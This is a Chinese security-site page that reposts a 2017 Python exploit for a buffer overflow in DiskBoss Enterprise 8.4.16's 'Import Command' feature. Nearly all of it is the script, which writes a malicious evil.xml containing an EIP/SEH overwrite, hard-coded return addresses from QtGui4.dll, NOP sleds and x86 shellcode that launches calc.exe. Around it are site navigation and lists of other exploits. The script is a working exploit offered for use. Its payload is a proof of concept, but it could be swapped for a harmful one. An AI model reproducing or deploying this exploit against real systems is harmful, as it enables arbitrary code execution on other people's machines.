首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 DiskBoss Enterprise 8.4.16 - 'Import Command' Buffer Overflow 来源：www.touhidshaikh.com 作者：Shaikh 发布时间：2017-10-10   #!/usr/bin/python   #======================================================================================================================== # Exploit Author: Touhid M.Shaikh # Exploit Title: DiskBoss Enterprise v8.4.16 "Import Command" Buffer Overflow # Date: 29-09-2017 # Website: www.touhidshaikh.com # Contact: https://github.com/touhidshaikh # Vulnerable Software: DiskBoss Enterprise v8.4.16 # Vendor Homepage: http://www.diskboss.com # Version: v8.4.16 # Software Link: http://www.diskboss.com/downloads.html # Tested On: Windows 7 x86 # # # To reproduce the exploit: #   1. right Click, click on Import Command #   2. select evil.xml , Booom Calc POPED up.. ;) #========================================================================================================================     import os,struct import sys   #offset to eip junk = "A" * (1560)   #JMP ESP (QtGui4.dll) jmp1 = struct.pack('<L',0x651bb77a)   #NOPS nops = "\x90"   #LEA   EAX, [ESP+76] esp = "\x8D\x44\x24\x4c"   #JMP ESP jmp2 = "\xFF\xE0"   #Jump short 5 nseh = "\x90\x90\xEB\x05"   #POP POP RET seh = struct.pack('<L',0x6501DE41)   #CALC.EXE pop shellcode shellcode = "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"     # FINAL PAYLOAD buf = junk + jmp1 + nops * 16 + esp + jmp2 + nops * 90 + nseh + seh + nops * 10 + shellcode     #FILE file='<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + buf + '\n</classify>'     f = open('evil.xml', 'w') f.write(file) f.close()   #GREETZ ---------- #Taushif(Brother) #-----------------   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·DiskBoss Enterprise 8.4.16 - L ·Trend Micro OfficeScan 11.0/XG ·Cisco Prime Collaboration Prov ·Dup Scout Enterprise 10.0.18 - ·LAquis SCADA 4.1.0.2385 - Dire ·FileRun < 2017.09.18 - SQL Inj ·Oracle WebLogic Server 10.3.6. ·Sync Breeze Enterprise 10.0.28 ·Fibaro Home Center 2 - Remote ·Microsoft Word 2007 (x86) - In ·NodeJS Debugger Command Inject ·Linux Kernel < 4.14.rc3 - Loca   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved